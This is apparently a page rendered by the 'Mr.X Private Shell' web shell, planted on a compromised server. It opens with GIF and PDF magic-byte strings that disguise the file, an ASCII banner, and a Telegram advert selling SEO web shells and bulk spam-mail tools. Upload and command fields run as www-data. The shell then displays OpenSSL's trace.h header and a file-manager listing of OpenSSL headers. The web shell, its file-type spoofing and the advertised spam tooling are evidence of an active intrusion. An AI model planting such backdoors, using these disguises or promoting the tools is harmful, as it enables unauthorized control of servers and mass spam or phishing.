GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
/*
 * Copyright 2019-2023 The OpenSSL Project Authors. All Rights Reserved.
 *
 * Licensed under the Apache License 2.0 (the "License").  You may not use
 * this file except in compliance with the License.  You can obtain a copy
 * in the file LICENSE in the source distribution or at
 * https://www.openssl.org/source/license.html
 */

#ifndef OPENSSL_TRACE_H
# define OPENSSL_TRACE_H
# pragma once

# include <stdarg.h>

# include <openssl/bio.h>

# ifdef  __cplusplus
extern "C" {
# endif

/*
 * TRACE CATEGORIES
 */

/*
 * The trace messages of the OpenSSL libraries are organized into different
 * categories. For every trace category, the application can register a separate
 * tracer callback. When a callback is registered, a so called trace channel is
 * created for this category. This channel consists essentially of an internal
 * BIO which sends all trace output it receives to the registered application
 * callback.
 *
 * The ALL category can be used as a fallback category to register a single
 * channel which receives the output from all categories. However, if the
 * application intends to print the trace channel name in the line prefix,
 * it is better to register channels for all categories separately.
 * (This is how the openssl application does it.)
 */
# define OSSL_TRACE_CATEGORY_ALL                 0 /* The fallback */
# define OSSL_TRACE_CATEGORY_TRACE               1
# define OSSL_TRACE_CATEGORY_INIT                2
# define OSSL_TRACE_CATEGORY_TLS                 3
# define OSSL_TRACE_CATEGORY_TLS_CIPHER          4
# define OSSL_TRACE_CATEGORY_CONF                5
# define OSSL_TRACE_CATEGORY_ENGINE_TABLE        6
# define OSSL_TRACE_CATEGORY_ENGINE_REF_COUNT    7
# define OSSL_TRACE_CATEGORY_PKCS5V2             8
# define OSSL_TRACE_CATEGORY_PKCS12_KEYGEN       9
# define OSSL_TRACE_CATEGORY_PKCS12_DECRYPT     10
# define OSSL_TRACE_CATEGORY_X509V3_POLICY      11
# define OSSL_TRACE_CATEGORY_BN_CTX             12
# define OSSL_TRACE_CATEGORY_CMP                13
# define OSSL_TRACE_CATEGORY_STORE              14
# define OSSL_TRACE_CATEGORY_DECODER            15
# define OSSL_TRACE_CATEGORY_ENCODER            16
# define OSSL_TRACE_CATEGORY_REF_COUNT          17
# define OSSL_TRACE_CATEGORY_HTTP               18
# define OSSL_TRACE_CATEGORY_PROVIDER           19
# define OSSL_TRACE_CATEGORY_QUERY              20
# define OSSL_TRACE_CATEGORY_NUM                21
/* KEEP THIS LIST IN SYNC with trace_categories[] in crypto/trace.c */

/* Returns the trace category number for the given |name| */
int OSSL_trace_get_category_num(const char *name);

/* Returns the trace category name for the given |num| */
const char *OSSL_trace_get_category_name(int num);

/*
 * TRACE CONSUMERS
 */

/*
 * Enables tracing for the given |category| by providing a BIO sink
 * as |channel|. If a null pointer is passed as |channel|, an existing
 * trace channel is removed and tracing for the category is disabled.
 *
 * Returns 1 on success and 0 on failure
 */
int OSSL_trace_set_channel(int category, BIO* channel);

/*
 * Attach a prefix and a suffix to the given |category|, to be printed at the
 * beginning and at the end of each trace output group, i.e. when
 * OSSL_trace_begin() and OSSL_trace_end() are called.
 * If a null pointer is passed as argument, the existing prefix or suffix is
 * removed.
 *
 * They return 1 on success and 0 on failure
 */
int OSSL_trace_set_prefix(int category, const char *prefix);
int OSSL_trace_set_suffix(int category, const char *suffix);

/*
 * OSSL_trace_cb is the type tracing callback provided by the application.
 * It MUST return the number of bytes written, or 0 on error (in other words,
 * it can never write zero bytes).
 *
 * The |buffer| will always contain text, which may consist of several lines.
 * The |data| argument points to whatever data was provided by the application
 * when registering the tracer function.
 *
 * The |category| number is given, as well as a |cmd| number, described below.
 */
typedef size_t (*OSSL_trace_cb)(const char *buffer, size_t count,
                                int category, int cmd, void *data);
/*
 * Possible |cmd| numbers.
 */
# define OSSL_TRACE_CTRL_BEGIN  0
# define OSSL_TRACE_CTRL_WRITE  1
# define OSSL_TRACE_CTRL_END    2

/*
 * Enables tracing for the given |category| by creating an internal
 * trace channel which sends the output to the given |callback|.
 * If a null pointer is passed as callback, an existing trace channel
 * is removed and tracing for the category is disabled.
 *
 * NOTE: OSSL_trace_set_channel() and OSSL_trace_set_callback() are mutually
 *       exclusive.
 *
 * Returns 1 on success and 0 on failure
 */
int OSSL_trace_set_callback(int category, OSSL_trace_cb callback, void *data);

/*
 * TRACE PRODUCERS
 */

/*
 * Returns 1 if tracing for the specified category is enabled, otherwise 0
 */
int OSSL_trace_enabled(int category);

/*
 * Wrap a group of tracing output calls.  OSSL_trace_begin() locks tracing and
 * returns the trace channel associated with the given category, or NULL if no
 * channel is associated with the category.  OSSL_trace_end() unlocks tracing.
 *
 * Usage:
 *
 *    BIO *out;
 *    if ((out = OSSL_trace_begin(category)) != NULL) {
 *        ...
 *        BIO_fprintf(out, ...);
 *        ...
 *        OSSL_trace_end(category, out);
 *    }
 *
 * See also the convenience macros OSSL_TRACE_BEGIN and OSSL_TRACE_END below.
 */
BIO *OSSL_trace_begin(int category);
void OSSL_trace_end(int category, BIO *channel);

/*
 * OSSL_TRACE* Convenience Macros
 */

/*
 * When the tracing feature is disabled, these macros are defined to
 * produce dead code, which a good compiler should eliminate.
 */

/*
 * OSSL_TRACE_BEGIN, OSSL_TRACE_END - Define a Trace Group
 *
 * These two macros can be used to create a block which is executed only
 * if the corresponding trace category is enabled. Inside this block, a
 * local variable named |trc_out| is defined, which points to the channel
 * associated with the given trace category.
 *
 * Usage: (using 'TLS' as an example category)
 *
 *     OSSL_TRACE_BEGIN(TLS) {
 *
 *         BIO_fprintf(trc_out, ... );
 *
 *     } OSSL_TRACE_END(TLS);
 *
 *
 * This expands to the following code
 *
 *     do {
 *         BIO *trc_out = OSSL_trace_begin(OSSL_TRACE_CATEGORY_TLS);
 *         if (trc_out != NULL) {
 *             ...
 *             BIO_fprintf(trc_out, ...);
 *         }
 *         OSSL_trace_end(OSSL_TRACE_CATEGORY_TLS, trc_out);
 *     } while (0);
 *
 * The use of the inner '{...}' group and the trailing ';' is enforced
 * by the definition of the macros in order to make the code look as much
 * like C code as possible.
 *
 * Before returning from inside the trace block, it is necessary to
 * call OSSL_TRACE_CANCEL(category).
 */

# if !defined OPENSSL_NO_TRACE && !defined FIPS_MODULE

#  define OSSL_TRACE_BEGIN(category) \
    do { \
        BIO *trc_out = OSSL_trace_begin(OSSL_TRACE_CATEGORY_##category); \
 \
        if (trc_out != NULL)

#  define OSSL_TRACE_END(category) \
        OSSL_trace_end(OSSL_TRACE_CATEGORY_##category, trc_out); \
    } while (0)

#  define OSSL_TRACE_CANCEL(category) \
        OSSL_trace_end(OSSL_TRACE_CATEGORY_##category, trc_out) \

# else

#  define OSSL_TRACE_BEGIN(category)           \
    do {                                        \
        BIO *trc_out = NULL;                    \
        if (0)

#  define OSSL_TRACE_END(category)             \
    } while(0)

#  define OSSL_TRACE_CANCEL(category)          \
    ((void)0)

# endif

/*
 * OSSL_TRACE_ENABLED() - Check whether tracing is enabled for |category|
 *
 * Usage:
 *
 *     if (OSSL_TRACE_ENABLED(TLS)) {
 *         ...
 *     }
 */
# if !defined OPENSSL_NO_TRACE && !defined FIPS_MODULE

#  define OSSL_TRACE_ENABLED(category) \
    OSSL_trace_enabled(OSSL_TRACE_CATEGORY_##category)

# else

#  define OSSL_TRACE_ENABLED(category) (0)

# endif

/*
 * OSSL_TRACE*() - OneShot Trace Macros
 *
 * These macros are intended to produce a simple printf-style trace output.
 * Unfortunately, C90 macros don't support variable arguments, so the
 * "vararg" OSSL_TRACEV() macro has a rather weird usage pattern:
 *
 *    OSSL_TRACEV(category, (trc_out, "format string", ...args...));
 *
 * Where 'channel' is the literal symbol of this name, not a variable.
 * For that reason, it is currently not intended to be used directly,
 * but only as helper macro for the other oneshot trace macros
 * OSSL_TRACE(), OSSL_TRACE1(), OSSL_TRACE2(), ...
 *
 * Usage:
 *
 *    OSSL_TRACE(INIT, "Hello world!\n");
 *    OSSL_TRACE1(TLS, "The answer is %d\n", 42);
 *    OSSL_TRACE2(TLS, "The ultimate question to answer %d is '%s'\n",
 *                42, "What do you get when you multiply six by nine?");
 */

# if !defined OPENSSL_NO_TRACE && !defined FIPS_MODULE

#  define OSSL_TRACEV(category, args) \
    OSSL_TRACE_BEGIN(category) \
        BIO_printf args; \
    OSSL_TRACE_END(category)

# else

#  define OSSL_TRACEV(category, args) ((void)0)

# endif

# define OSSL_TRACE(category, text) \
    OSSL_TRACEV(category, (trc_out, "%s", text))

# define OSSL_TRACE1(category, format, arg1) \
    OSSL_TRACEV(category, (trc_out, format, arg1))
# define OSSL_TRACE2(category, format, arg1, arg2) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2))
# define OSSL_TRACE3(category, format, arg1, arg2, arg3) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2, arg3))
# define OSSL_TRACE4(category, format, arg1, arg2, arg3, arg4) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2, arg3, arg4))
# define OSSL_TRACE5(category, format, arg1, arg2, arg3, arg4, arg5) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2, arg3, arg4, arg5))
# define OSSL_TRACE6(category, format, arg1, arg2, arg3, arg4, arg5, arg6) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2, arg3, arg4, arg5, arg6))
# define OSSL_TRACE7(category, format, arg1, arg2, arg3, arg4, arg5, arg6, arg7) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2, arg3, arg4, arg5, arg6, arg7))
# define OSSL_TRACE8(category, format, arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8))
# define OSSL_TRACE9(category, format, arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9) \
    OSSL_TRACEV(category, (trc_out, format, arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9))

#define OSSL_TRACE_STRING_MAX 80
int OSSL_trace_string(BIO *out, int text, int full,
                      const unsigned char *data, size_t size);
#define OSSL_TRACE_STRING(category, text, full, data, len) \
    OSSL_TRACE_BEGIN(category) { \
        OSSL_trace_string(trc_out, text, full, data, len);  \
    } OSSL_TRACE_END(category)

# ifdef  __cplusplus
}
# endif

#endif

Filemanager

Name Type Size Permission Actions
archs Folder 0755
aes.h File 3.66 KB 0644
asn1.h File 94 B 0644
asn1_asm.h File 2.41 KB 0644
asn1_no-asm.h File 2.69 KB 0644
asn1err.h File 7.67 KB 0644
asn1t.h File 96 B 0644
asn1t_asm.h File 2.43 KB 0644
asn1t_no-asm.h File 2.71 KB 0644
async.h File 3.42 KB 0644
asyncerr.h File 842 B 0644
bio.h File 92 B 0644
bio_asm.h File 2.39 KB 0644
bio_no-asm.h File 2.67 KB 0644
bioerr.h File 3.43 KB 0644
blowfish.h File 2.63 KB 0644
bn.h File 23.62 KB 0644
bn_conf.h File 100 B 0644
bn_conf_asm.h File 2.45 KB 0644
bn_conf_no-asm.h File 2.73 KB 0644
bnerr.h File 1.9 KB 0644
buffer.h File 1.62 KB 0644
buffererr.h File 594 B 0644
byteorder.h File 8.43 KB 0644
camellia.h File 4.95 KB 0644
cast.h File 2.02 KB 0644
cmac.h File 1.57 KB 0644
cmp.h File 92 B 0644
cmp_asm.h File 2.39 KB 0644
cmp_no-asm.h File 2.67 KB 0644
cmp_util.h File 1.7 KB 0644
cmperr.h File 7.13 KB 0644
cms.h File 92 B 0644
cms_asm.h File 2.39 KB 0644
cms_no-asm.h File 2.67 KB 0644
cmserr.h File 6.63 KB 0644
comp.h File 94 B 0644
comp_asm.h File 2.41 KB 0644
comp_no-asm.h File 2.69 KB 0644
comperr.h File 1.22 KB 0644
conf.h File 94 B 0644
conf_api.h File 1.39 KB 0644
conf_asm.h File 2.41 KB 0644
conf_no-asm.h File 2.69 KB 0644
conferr.h File 2.21 KB 0644
configuration.h File 112 B 0644
configuration_asm.h File 2.58 KB 0644
configuration_no-asm.h File 2.88 KB 0644
conftypes.h File 1.16 KB 0644
core.h File 7.99 KB 0644
core_dispatch.h File 57.19 KB 0644
core_names.h File 106 B 0644
core_names_asm.h File 2.52 KB 0644
core_names_no-asm.h File 2.81 KB 0644
core_object.h File 1.1 KB 0644
crmf.h File 94 B 0644
crmf_asm.h File 2.41 KB 0644
crmf_no-asm.h File 2.69 KB 0644
crmferr.h File 2.39 KB 0644
crypto.h File 98 B 0644
crypto_asm.h File 2.45 KB 0644
crypto_no-asm.h File 2.73 KB 0644
cryptoerr.h File 2.47 KB 0644
cryptoerr_legacy.h File 78.51 KB 0644
ct.h File 90 B 0644
ct_asm.h File 2.37 KB 0644
ct_no-asm.h File 2.65 KB 0644
cterr.h File 1.65 KB 0644
decoder.h File 5.63 KB 0644
decodererr.h File 791 B 0644
des.h File 8.33 KB 0644
dh.h File 15.11 KB 0644
dherr.h File 2.51 KB 0644
dsa.h File 12.24 KB 0644
dsaerr.h File 1.59 KB 0644
dso_conf.h File 102 B 0644
dso_conf_asm.h File 2.47 KB 0644
dso_conf_no-asm.h File 2.75 KB 0644
dtls1.h File 1.43 KB 0644
e_os2.h File 8.64 KB 0644
e_ostime.h File 1.16 KB 0644
ebcdic.h File 1.02 KB 0644
ec.h File 66.84 KB 0644
ecdh.h File 361 B 0644
ecdsa.h File 361 B 0644
ecerr.h File 5.28 KB 0644
encoder.h File 5.32 KB 0644
encodererr.h File 791 B 0644
engine.h File 37.91 KB 0644
engineerr.h File 2.77 KB 0644
err.h File 92 B 0644
err_asm.h File 2.39 KB 0644
err_no-asm.h File 2.67 KB 0644
ess.h File 92 B 0644
ess_asm.h File 2.39 KB 0644
ess_no-asm.h File 2.67 KB 0644
esserr.h File 1.12 KB 0644
evp.h File 109.22 KB 0644
evperr.h File 8.03 KB 0644
fips_names.h File 1.62 KB 0644
fipskey.h File 100 B 0644
fipskey_asm.h File 2.47 KB 0644
fipskey_no-asm.h File 2.75 KB 0644
hmac.h File 2.09 KB 0644
hpke.h File 6.82 KB 0644
http.h File 5.53 KB 0644
httperr.h File 2.45 KB 0644
idea.h File 2.94 KB 0644
indicator.h File 917 B 0644
kdf.h File 5.49 KB 0644
kdferr.h File 482 B 0644
lhash.h File 96 B 0644
lhash_asm.h File 2.43 KB 0644
lhash_no-asm.h File 2.71 KB 0644
macros.h File 11.21 KB 0644
md2.h File 1.43 KB 0644
md4.h File 1.66 KB 0644
md5.h File 1.66 KB 0644
mdc2.h File 1.41 KB 0644
ml_kem.h File 1.02 KB 0644
modes.h File 10.53 KB 0644
obj_mac.h File 283.11 KB 0644
objects.h File 6.73 KB 0644
objectserr.h File 782 B 0644
ocsp.h File 94 B 0644
ocsp_asm.h File 2.41 KB 0644
ocsp_no-asm.h File 2.69 KB 0644
ocsperr.h File 2.15 KB 0644
opensslconf.h File 515 B 0644
opensslconf_asm.h File 6.77 KB 0644
opensslv.h File 102 B 0644
opensslv_asm.h File 2.48 KB 0644
opensslv_no-asm.h File 2.77 KB 0644
ossl_typ.h File 562 B 0644
param_build.h File 2.74 KB 0644
param_names.h File 108 B 0644
param_names_asm.h File 2.56 KB 0644
param_names_no-asm.h File 2.86 KB 0644
params.h File 7.27 KB 0644
pem.h File 25.64 KB 0644
pem2.h File 531 B 0644
pemerr.h File 2.63 KB 0644
pkcs12.h File 98 B 0644
pkcs12_asm.h File 2.45 KB 0644
pkcs12_no-asm.h File 2.73 KB 0644
pkcs12err.h File 1.85 KB 0644
pkcs7.h File 96 B 0644
pkcs7_asm.h File 2.43 KB 0644
pkcs7_no-asm.h File 2.71 KB 0644
pkcs7err.h File 2.88 KB 0644
prov_ssl.h File 1.11 KB 0644
proverr.h File 9.36 KB 0644
provider.h File 3.82 KB 0644
quic.h File 2.26 KB 0644
rand.h File 4.08 KB 0644
randerr.h File 3.3 KB 0644
rc2.h File 2.33 KB 0644
rc4.h File 1.17 KB 0644
rc5.h File 2.79 KB 0644
ripemd.h File 1.68 KB 0644
rsa.h File 27.81 KB 0644
rsaerr.h File 5.55 KB 0644
safestack.h File 104 B 0644
safestack_asm.h File 2.5 KB 0644
safestack_no-asm.h File 2.79 KB 0644
seed.h File 3.87 KB 0644
self_test.h File 5.13 KB 0644
sha.h File 4.58 KB 0644
srp.h File 92 B 0644
srp_asm.h File 2.39 KB 0644
srp_no-asm.h File 2.67 KB 0644
srtp.h File 2.13 KB 0644
ssl.h File 92 B 0644
ssl2.h File 658 B 0644
ssl3.h File 14.87 KB 0644
ssl_asm.h File 2.39 KB 0644
ssl_no-asm.h File 2.67 KB 0644
sslerr.h File 22.23 KB 0644
sslerr_legacy.h File 26.31 KB 0644
stack.h File 3.21 KB 0644
store.h File 15.1 KB 0644
storeerr.h File 2.04 KB 0644
symhacks.h File 1.26 KB 0644
thread.h File 871 B 0644
tls1.h File 71.38 KB 0644
trace.h File 10.55 KB 0644
ts.h File 20.12 KB 0644
tserr.h File 3 KB 0644
txt_db.h File 1.74 KB 0644
types.h File 7.33 KB 0644
ui.h File 90 B 0644
ui_asm.h File 2.37 KB 0644
ui_no-asm.h File 2.65 KB 0644
uierr.h File 1.36 KB 0644
whrlpool.h File 1.81 KB 0644
x509.h File 94 B 0644
x509_acert.h File 106 B 0644
x509_acert_asm.h File 2.52 KB 0644
x509_acert_no-asm.h File 2.81 KB 0644
x509_asm.h File 2.41 KB 0644
x509_no-asm.h File 2.69 KB 0644
x509_vfy.h File 102 B 0644
x509_vfy_asm.h File 2.48 KB 0644
x509_vfy_no-asm.h File 2.77 KB 0644
x509err.h File 3.3 KB 0644
x509v3.h File 98 B 0644
x509v3_asm.h File 2.45 KB 0644
x509v3_no-asm.h File 2.73 KB 0644
x509v3err.h File 4.95 KB 0644